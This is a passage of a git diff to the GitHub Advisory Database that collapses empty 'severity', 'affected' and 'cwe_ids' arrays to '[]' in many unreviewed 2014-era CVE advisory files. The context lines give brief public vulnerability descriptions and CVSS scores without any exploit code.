"details": "Race condition in the Enterprise Tree ActiveX control (EnterpriseControls.dll 11.5.0.313) in Crystal Reports XI Release 2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the SelectedSession method, which triggers a buffer overflow.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-qmf7-fj73-rx79/GHSA-qmf7-fj73-rx79.json b/advisories/unreviewed/2022/05/GHSA-qmf7-fj73-rx79/GHSA-qmf7-fj73-rx79.json
index 8aee6714dd5..b41cc175016 100644
--- a/advisories/unreviewed/2022/05/GHSA-qmf7-fj73-rx79/GHSA-qmf7-fj73-rx79.json
+++ b/advisories/unreviewed/2022/05/GHSA-qmf7-fj73-rx79/GHSA-qmf7-fj73-rx79.json
@@ -7,12 +7,8 @@
"CVE-2014-4663"
],
"details": "TimThumb 2.8.13 and WordThumb 1.07, when Webshot (aka Webshots) is enabled, allows remote attackers to execute arbitrary commands via shell metacharacters in the src parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-qmx7-mprr-632v/GHSA-qmx7-mprr-632v.json b/advisories/unreviewed/2022/05/GHSA-qmx7-mprr-632v/GHSA-qmx7-mprr-632v.json
index 5f47cb15409..006ff94a5ce 100644
--- a/advisories/unreviewed/2022/05/GHSA-qmx7-mprr-632v/GHSA-qmx7-mprr-632v.json
+++ b/advisories/unreviewed/2022/05/GHSA-qmx7-mprr-632v/GHSA-qmx7-mprr-632v.json
@@ -7,12 +7,8 @@
"CVE-2014-2882"
],
"details": "Unspecified vulnerability in the management GUI in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway before 9.3-66.5 and 10.x before 10.1-122.17 has unspecified impact and vectors, related to certificate validation.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -28,9 +24,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-qpj6-77vj-fppc/GHSA-qpj6-77vj-fppc.json b/advisories/unreviewed/2022/05/GHSA-qpj6-77vj-fppc/GHSA-qpj6-77vj-fppc.json
index c1baaec4126..8a553a54e74 100644
--- a/advisories/unreviewed/2022/05/GHSA-qpj6-77vj-fppc/GHSA-qpj6-77vj-fppc.json
+++ b/advisories/unreviewed/2022/05/GHSA-qpj6-77vj-fppc/GHSA-qpj6-77vj-fppc.json
@@ -7,12 +7,8 @@
"CVE-2014-3991"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in Dolibarr ERP/CRM 3.5.3 allow remote attackers to inject arbitrary web script or HTML via the (1) dol_use_jmobile, (2) dol_optimize_smallscreen, (3) dol_no_mouse_hover, (4) dol_hide_topmenu, (5) dol_hide_leftmenu, (6) mainmenu, or (7) leftmenu parameter to index.php; the (8) dol_use_jmobile, (9) dol_optimize_smallscreen, (10) dol_no_mouse_hover, (11) dol_hide_topmenu, or (12) dol_hide_leftmenu parameter to user/index.php; the (13) dol_use_jmobile, (14) dol_optimize_smallscreen, (15) dol_no_mouse_hover, (16) dol_hide_topmenu, or (17) dol_hide_leftmenu parameter to user/logout.php; the (18) email, (19) firstname, (20) job, (21) lastname, or (22) login parameter in an update action in a \"User Card\" to user/fiche.php; or the (23) modulepart or (24) file parameter to viewimage.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json b/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json
index dacd10984eb..a365c356b8b 100644
--- a/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json
+++ b/advisories/unreviewed/2022/05/GHSA-qvh7-j2x6-25x5/GHSA-qvh7-j2x6-25x5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-qw9j-5qj4-h383/GHSA-qw9j-5qj4-h383.json b/advisories/unreviewed/2022/05/GHSA-qw9j-5qj4-h383/GHSA-qw9j-5qj4-h383.json
index 96ad75a76b7..4ac3f96be0f 100644
--- a/advisories/unreviewed/2022/05/GHSA-qw9j-5qj4-h383/GHSA-qw9j-5qj4-h383.json
+++ b/advisories/unreviewed/2022/05/GHSA-qw9j-5qj4-h383/GHSA-qw9j-5qj4-h383.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-qx32-4xrf-2j53/GHSA-qx32-4xrf-2j53.json b/advisories/unreviewed/2022/05/GHSA-qx32-4xrf-2j53/GHSA-qx32-4xrf-2j53.json
index 9cd914827cc..cd72418f31d 100644
--- a/advisories/unreviewed/2022/05/GHSA-qx32-4xrf-2j53/GHSA-qx32-4xrf-2j53.json
+++ b/advisories/unreviewed/2022/05/GHSA-qx32-4xrf-2j53/GHSA-qx32-4xrf-2j53.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-qxjj-wxg4-3fhm/GHSA-qxjj-wxg4-3fhm.json b/advisories/unreviewed/2022/05/GHSA-qxjj-wxg4-3fhm/GHSA-qxjj-wxg4-3fhm.json
index de64bed9230..fda962f2ec7 100644
--- a/advisories/unreviewed/2022/05/GHSA-qxjj-wxg4-3fhm/GHSA-qxjj-wxg4-3fhm.json
+++ b/advisories/unreviewed/2022/05/GHSA-qxjj-wxg4-3fhm/GHSA-qxjj-wxg4-3fhm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-r3ph-2w75-jgcj/GHSA-r3ph-2w75-jgcj.json b/advisories/unreviewed/2022/05/GHSA-r3ph-2w75-jgcj/GHSA-r3ph-2w75-jgcj.json
index c20f3783906..9739a27a327 100644
--- a/advisories/unreviewed/2022/05/GHSA-r3ph-2w75-jgcj/GHSA-r3ph-2w75-jgcj.json
+++ b/advisories/unreviewed/2022/05/GHSA-r3ph-2w75-jgcj/GHSA-r3ph-2w75-jgcj.json
@@ -7,12 +7,8 @@
"CVE-2014-2934"
],
"details": "Multiple SQL injection vulnerabilities in Caldera 9.20 allow remote attackers to execute arbitrary SQL commands via the tr parameter to (1) costview2/jobs.php or (2) costview2/printers.php.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-r4gv-qfm6-c65r/GHSA-r4gv-qfm6-c65r.json b/advisories/unreviewed/2022/05/GHSA-r4gv-qfm6-c65r/GHSA-r4gv-qfm6-c65r.json
index a11854fa390..a68c9ea9b8c 100644
--- a/advisories/unreviewed/2022/05/GHSA-r4gv-qfm6-c65r/GHSA-r4gv-qfm6-c65r.json
+++ b/advisories/unreviewed/2022/05/GHSA-r4gv-qfm6-c65r/GHSA-r4gv-qfm6-c65r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-r4h6-h9mw-ff68/GHSA-r4h6-h9mw-ff68.json b/advisories/unreviewed/2022/05/GHSA-r4h6-h9mw-ff68/GHSA-r4h6-h9mw-ff68.json
index b571ac79eb9..bb5c8120311 100644
--- a/advisories/unreviewed/2022/05/GHSA-r4h6-h9mw-ff68/GHSA-r4h6-h9mw-ff68.json
+++ b/advisories/unreviewed/2022/05/GHSA-r4h6-h9mw-ff68/GHSA-r4h6-h9mw-ff68.json
@@ -7,12 +7,8 @@
"CVE-2014-4574"
],
"details": "Cross-site scripting (XSS) vulnerability in resize.php in the WebEngage plugin before 2.0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the height parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-r64q-3fpg-c3hr/GHSA-r64q-3fpg-c3hr.json b/advisories/unreviewed/2022/05/GHSA-r64q-3fpg-c3hr/GHSA-r64q-3fpg-c3hr.json
index 70860b297be..6b88fb8efaf 100644
--- a/advisories/unreviewed/2022/05/GHSA-r64q-3fpg-c3hr/GHSA-r64q-3fpg-c3hr.json
+++ b/advisories/unreviewed/2022/05/GHSA-r64q-3fpg-c3hr/GHSA-r64q-3fpg-c3hr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-r77x-jc2c-73vx/GHSA-r77x-jc2c-73vx.json b/advisories/unreviewed/2022/05/GHSA-r77x-jc2c-73vx/GHSA-r77x-jc2c-73vx.json
index 79143ed2811..aa5063bf5a4 100644
--- a/advisories/unreviewed/2022/05/GHSA-r77x-jc2c-73vx/GHSA-r77x-jc2c-73vx.json
+++ b/advisories/unreviewed/2022/05/GHSA-r77x-jc2c-73vx/GHSA-r77x-jc2c-73vx.json
@@ -7,12 +7,8 @@
"CVE-2014-4855"
],
"details": "Cross-site scripting (XSS) vulnerability in the Polylang plugin before 1.5.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via vectors related to a user description. NOTE: some of these details are obtained from third party information.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-r7fm-wmvm-97pq/GHSA-r7fm-wmvm-97pq.json b/advisories/unreviewed/2022/05/GHSA-r7fm-wmvm-97pq/GHSA-r7fm-wmvm-97pq.json
index 53fd785b6f7..15912959b90 100644
--- a/advisories/unreviewed/2022/05/GHSA-r7fm-wmvm-97pq/GHSA-r7fm-wmvm-97pq.json
+++ b/advisories/unreviewed/2022/05/GHSA-r7fm-wmvm-97pq/GHSA-r7fm-wmvm-97pq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json b/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json
index 1c4d4b28abf..27ca95985db 100644
--- a/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json
+++ b/advisories/unreviewed/2022/05/GHSA-r859-p3hv-36hf/GHSA-r859-p3hv-36hf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rc27-w7x3-jmp4/GHSA-rc27-w7x3-jmp4.json b/advisories/unreviewed/2022/05/GHSA-rc27-w7x3-jmp4/GHSA-rc27-w7x3-jmp4.json
index 2d83287bfa1..879739810b6 100644
--- a/advisories/unreviewed/2022/05/GHSA-rc27-w7x3-jmp4/GHSA-rc27-w7x3-jmp4.json
+++ b/advisories/unreviewed/2022/05/GHSA-rc27-w7x3-jmp4/GHSA-rc27-w7x3-jmp4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rc6c-rqx8-wrpc/GHSA-rc6c-rqx8-wrpc.json b/advisories/unreviewed/2022/05/GHSA-rc6c-rqx8-wrpc/GHSA-rc6c-rqx8-wrpc.json
index 9cb7b7d43f6..c258e00f503 100644
--- a/advisories/unreviewed/2022/05/GHSA-rc6c-rqx8-wrpc/GHSA-rc6c-rqx8-wrpc.json
+++ b/advisories/unreviewed/2022/05/GHSA-rc6c-rqx8-wrpc/GHSA-rc6c-rqx8-wrpc.json
@@ -7,12 +7,8 @@
"CVE-2014-4513"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rc75-mpwg-p3r6/GHSA-rc75-mpwg-p3r6.json b/advisories/unreviewed/2022/05/GHSA-rc75-mpwg-p3r6/GHSA-rc75-mpwg-p3r6.json
index 89c8bba11fa..94c0b262802 100644
--- a/advisories/unreviewed/2022/05/GHSA-rc75-mpwg-p3r6/GHSA-rc75-mpwg-p3r6.json
+++ b/advisories/unreviewed/2022/05/GHSA-rc75-mpwg-p3r6/GHSA-rc75-mpwg-p3r6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-rcq2-f9v3-rfv8/GHSA-rcq2-f9v3-rfv8.json b/advisories/unreviewed/2022/05/GHSA-rcq2-f9v3-rfv8/GHSA-rcq2-f9v3-rfv8.json
index a77bc418cb6..34aae7b9f24 100644
--- a/advisories/unreviewed/2022/05/GHSA-rcq2-f9v3-rfv8/GHSA-rcq2-f9v3-rfv8.json
+++ b/advisories/unreviewed/2022/05/GHSA-rcq2-f9v3-rfv8/GHSA-rcq2-f9v3-rfv8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-rcvp-h4ff-375m/GHSA-rcvp-h4ff-375m.json b/advisories/unreviewed/2022/05/GHSA-rcvp-h4ff-375m/GHSA-rcvp-h4ff-375m.json
index 83f281eb57b..4a4fae9f7bc 100644
--- a/advisories/unreviewed/2022/05/GHSA-rcvp-h4ff-375m/GHSA-rcvp-h4ff-375m.json
+++ b/advisories/unreviewed/2022/05/GHSA-rcvp-h4ff-375m/GHSA-rcvp-h4ff-375m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rfx2-r7w4-hgcp/GHSA-rfx2-r7w4-hgcp.json b/advisories/unreviewed/2022/05/GHSA-rfx2-r7w4-hgcp/GHSA-rfx2-r7w4-hgcp.json
index 31cd8d077b0..57c07557954 100644
--- a/advisories/unreviewed/2022/05/GHSA-rfx2-r7w4-hgcp/GHSA-rfx2-r7w4-hgcp.json
+++ b/advisories/unreviewed/2022/05/GHSA-rfx2-r7w4-hgcp/GHSA-rfx2-r7w4-hgcp.json
@@ -7,12 +7,8 @@
"CVE-2013-2595"
],
"details": "The device-initialization functionality in the MSM camera driver for the Linux kernel 2.6.x and 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, enables MSM_CAM_IOCTL_SET_MEM_MAP_INFO ioctl calls for an unrestricted mmap interface, which allows attackers to gain privileges via a crafted application.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-rjv8-3qj4-v367/GHSA-rjv8-3qj4-v367.json b/advisories/unreviewed/2022/05/GHSA-rjv8-3qj4-v367/GHSA-rjv8-3qj4-v367.json
index 5ce83406e08..7d092fd0157 100644
--- a/advisories/unreviewed/2022/05/GHSA-rjv8-3qj4-v367/GHSA-rjv8-3qj4-v367.json
+++ b/advisories/unreviewed/2022/05/GHSA-rjv8-3qj4-v367/GHSA-rjv8-3qj4-v367.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-rm62-4x72-vwwp/GHSA-rm62-4x72-vwwp.json b/advisories/unreviewed/2022/05/GHSA-rm62-4x72-vwwp/GHSA-rm62-4x72-vwwp.json
index ffc7eea376f..8bbba67ea66 100644
--- a/advisories/unreviewed/2022/05/GHSA-rm62-4x72-vwwp/GHSA-rm62-4x72-vwwp.json
+++ b/advisories/unreviewed/2022/05/GHSA-rm62-4x72-vwwp/GHSA-rm62-4x72-vwwp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rmfc-w52c-mp4g/GHSA-rmfc-w52c-mp4g.json b/advisories/unreviewed/2022/05/GHSA-rmfc-w52c-mp4g/GHSA-rmfc-w52c-mp4g.json
index 10452a397ed..4c0c39e742c 100644
--- a/advisories/unreviewed/2022/05/GHSA-rmfc-w52c-mp4g/GHSA-rmfc-w52c-mp4g.json
+++ b/advisories/unreviewed/2022/05/GHSA-rmfc-w52c-mp4g/GHSA-rmfc-w52c-mp4g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rp3q-fvfg-2mx2/GHSA-rp3q-fvfg-2mx2.json b/advisories/unreviewed/2022/05/GHSA-rp3q-fvfg-2mx2/GHSA-rp3q-fvfg-2mx2.json
index 18e5022d95a..a1d719cd63f 100644
--- a/advisories/unreviewed/2022/05/GHSA-rp3q-fvfg-2mx2/GHSA-rp3q-fvfg-2mx2.json
+++ b/advisories/unreviewed/2022/05/GHSA-rp3q-fvfg-2mx2/GHSA-rp3q-fvfg-2mx2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rq2q-6mpw-576g/GHSA-rq2q-6mpw-576g.json b/advisories/unreviewed/2022/05/GHSA-rq2q-6mpw-576g/GHSA-rq2q-6mpw-576g.json
index 3278415164d..75ff3310067 100644
--- a/advisories/unreviewed/2022/05/GHSA-rq2q-6mpw-576g/GHSA-rq2q-6mpw-576g.json
+++ b/advisories/unreviewed/2022/05/GHSA-rq2q-6mpw-576g/GHSA-rq2q-6mpw-576g.json
@@ -7,12 +7,8 @@
"CVE-2014-4850"
],
"details": "SQL injection vulnerability in index.php in FoeCMS allows remote attackers to execute arbitrary SQL commands via the i parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rqrc-v2qh-jp48/GHSA-rqrc-v2qh-jp48.json b/advisories/unreviewed/2022/05/GHSA-rqrc-v2qh-jp48/GHSA-rqrc-v2qh-jp48.json
index 30f325e203f..80aa3c6538b 100644
--- a/advisories/unreviewed/2022/05/GHSA-rqrc-v2qh-jp48/GHSA-rqrc-v2qh-jp48.json
+++ b/advisories/unreviewed/2022/05/GHSA-rqrc-v2qh-jp48/GHSA-rqrc-v2qh-jp48.json
@@ -7,12 +7,8 @@
"CVE-2014-4013"
],
"details": "SQL injection vulnerability in the Policy Manager in Aruba Networks ClearPass 5.x, 6.0.x, 6.1.x through 6.1.4.61696, 6.2.x through 6.2.6.62196, and 6.3.x before 6.3.4 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rqv3-hfq6-w2fr/GHSA-rqv3-hfq6-w2fr.json b/advisories/unreviewed/2022/05/GHSA-rqv3-hfq6-w2fr/GHSA-rqv3-hfq6-w2fr.json
index 1fdc6dea180..bb2ed068d20 100644
--- a/advisories/unreviewed/2022/05/GHSA-rqv3-hfq6-w2fr/GHSA-rqv3-hfq6-w2fr.json
+++ b/advisories/unreviewed/2022/05/GHSA-rqv3-hfq6-w2fr/GHSA-rqv3-hfq6-w2fr.json
@@ -7,12 +7,8 @@
"CVE-2014-2612"
],
"details": "Unspecified vulnerability in HP Release Control 9.x before 9.13 p3 and 9.2x before RC 9.21.0003 p1 on Windows and 9.2x before RC 9.21.0002 p1 on Linux allows remote authenticated users to obtain sensitive information via unknown vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-rrxp-xq3m-923g/GHSA-rrxp-xq3m-923g.json b/advisories/unreviewed/2022/05/GHSA-rrxp-xq3m-923g/GHSA-rrxp-xq3m-923g.json
index 1c5b177e8b2..5e51c6832e8 100644
--- a/advisories/unreviewed/2022/05/GHSA-rrxp-xq3m-923g/GHSA-rrxp-xq3m-923g.json
+++ b/advisories/unreviewed/2022/05/GHSA-rrxp-xq3m-923g/GHSA-rrxp-xq3m-923g.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rw29-r7x7-2gmq/GHSA-rw29-r7x7-2gmq.json b/advisories/unreviewed/2022/05/GHSA-rw29-r7x7-2gmq/GHSA-rw29-r7x7-2gmq.json
index d30461b0d7a..47f9122748f 100644
--- a/advisories/unreviewed/2022/05/GHSA-rw29-r7x7-2gmq/GHSA-rw29-r7x7-2gmq.json
+++ b/advisories/unreviewed/2022/05/GHSA-rw29-r7x7-2gmq/GHSA-rw29-r7x7-2gmq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rwqh-j78v-fcc9/GHSA-rwqh-j78v-fcc9.json b/advisories/unreviewed/2022/05/GHSA-rwqh-j78v-fcc9/GHSA-rwqh-j78v-fcc9.json
index b9190c124a7..44255ea4fef 100644
--- a/advisories/unreviewed/2022/05/GHSA-rwqh-j78v-fcc9/GHSA-rwqh-j78v-fcc9.json
+++ b/advisories/unreviewed/2022/05/GHSA-rwqh-j78v-fcc9/GHSA-rwqh-j78v-fcc9.json
@@ -7,12 +7,8 @@
"CVE-2014-3862"
],
"details": "CDA.xsl in HL7 C-CDA 1.1 and earlier allows remote attackers to discover potentially sensitive URLs via a crafted reference element that triggers creation of an IMG element with an arbitrary URL in its SRC attribute, leading to information disclosure in a Referer log.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-rwvr-cwx6-xh6x/GHSA-rwvr-cwx6-xh6x.json b/advisories/unreviewed/2022/05/GHSA-rwvr-cwx6-xh6x/GHSA-rwvr-cwx6-xh6x.json
index e84764cf847..6c84f5f6715 100644
--- a/advisories/unreviewed/2022/05/GHSA-rwvr-cwx6-xh6x/GHSA-rwvr-cwx6-xh6x.json
+++ b/advisories/unreviewed/2022/05/GHSA-rwvr-cwx6-xh6x/GHSA-rwvr-cwx6-xh6x.json
@@ -7,12 +7,8 @@
"CVE-2014-2965"
],
"details": "Cross-site scripting (XSS) vulnerability in auth-settings-x.php in SpamTitan before 6.04 allows remote attackers to inject arbitrary web script or HTML via the sortdir parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-v2vx-6wxg-c984/GHSA-v2vx-6wxg-c984.json b/advisories/unreviewed/2022/05/GHSA-v2vx-6wxg-c984/GHSA-v2vx-6wxg-c984.json
index b87893f819e..f4fa1e1f29d 100644
--- a/advisories/unreviewed/2022/05/GHSA-v2vx-6wxg-c984/GHSA-v2vx-6wxg-c984.json
+++ b/advisories/unreviewed/2022/05/GHSA-v2vx-6wxg-c984/GHSA-v2vx-6wxg-c984.json
@@ -7,12 +7,8 @@
"CVE-2014-4031"
],
"details": "The Policy Manager in Aruba Networks ClearPass 5.x, 6.0.x, 6.1.x through 6.1.4.61696, 6.2.x through 6.2.6.62196, and 6.3.x before 6.3.4 allows remote authenticated users to obtain database credentials via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-v53j-pwvr-vh92/GHSA-v53j-pwvr-vh92.json b/advisories/unreviewed/2022/05/GHSA-v53j-pwvr-vh92/GHSA-v53j-pwvr-vh92.json
index a7b8313a308..5d54008fe0f 100644
--- a/advisories/unreviewed/2022/05/GHSA-v53j-pwvr-vh92/GHSA-v53j-pwvr-vh92.json
+++ b/advisories/unreviewed/2022/05/GHSA-v53j-pwvr-vh92/GHSA-v53j-pwvr-vh92.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-v5cf-8vgj-92rr/GHSA-v5cf-8vgj-92rr.json b/advisories/unreviewed/2022/05/GHSA-v5cf-8vgj-92rr/GHSA-v5cf-8vgj-92rr.json
index 9b3a4665c17..f27ee043e57 100644
--- a/advisories/unreviewed/2022/05/GHSA-v5cf-8vgj-92rr/GHSA-v5cf-8vgj-92rr.json
+++ b/advisories/unreviewed/2022/05/GHSA-v5cf-8vgj-92rr/GHSA-v5cf-8vgj-92rr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-v5qg-36wv-7qpm/GHSA-v5qg-36wv-7qpm.json b/advisories/unreviewed/2022/05/GHSA-v5qg-36wv-7qpm/GHSA-v5qg-36wv-7qpm.json
index a73be333c7e..935dc60ebb6 100644
--- a/advisories/unreviewed/2022/05/GHSA-v5qg-36wv-7qpm/GHSA-v5qg-36wv-7qpm.json
